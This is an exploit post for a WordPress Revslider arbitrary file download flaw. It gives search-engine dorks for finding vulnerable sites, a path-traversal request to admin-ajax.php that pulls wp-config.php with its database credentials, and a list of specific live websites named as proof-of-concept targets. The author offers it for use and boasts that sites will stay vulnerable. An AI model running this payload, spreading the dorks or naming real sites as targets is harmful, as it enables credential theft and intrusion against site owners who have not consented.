facebook facebook twitter rss

WordPress Arbitrary File Download {0day}

Author: bRpsd , Published: 04-10-2014
#TITLE: WordPress Arbitrary File Download {0day}
#Author: bRpsd
#Mail: cy@Live.no
#Skype: vegnox
#DORKS (FIXED):
inurl:wp-content
inurl:wp-content/themes/
inurl:wp-content inurl:revslider
inurl:wp-content intext:revslider.php
inurl:wp-content intext:revslider_front.php
inurl:wp-content intext:revslider.php site:il
themes/WP-Smartcheck
themes/stendhal
theme/templates/sliders
themes/RoyalOak
themes/celestino2
plugins/dnd-shortcodes
themes/incrediblewp
themes/celestino
plugins/meteor-extras
themes/bazar
themes/cheope
themes/aziza

# How to exploit ;
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

(e.g) ;
http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

(Demo) (test) (P0C) ;
www.sharek.ps/en/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.lorencitavdesantos.gov.co/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.southvanphysio.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.lasallest.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.daleeke.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

# This exploit used to be old , because people used wrong dorks .. So i changed on dorks and i got many results!
# Sites will never end being vulnerable (:
#Enjoy Everyone .. Piece ~!

Like us on Facebook :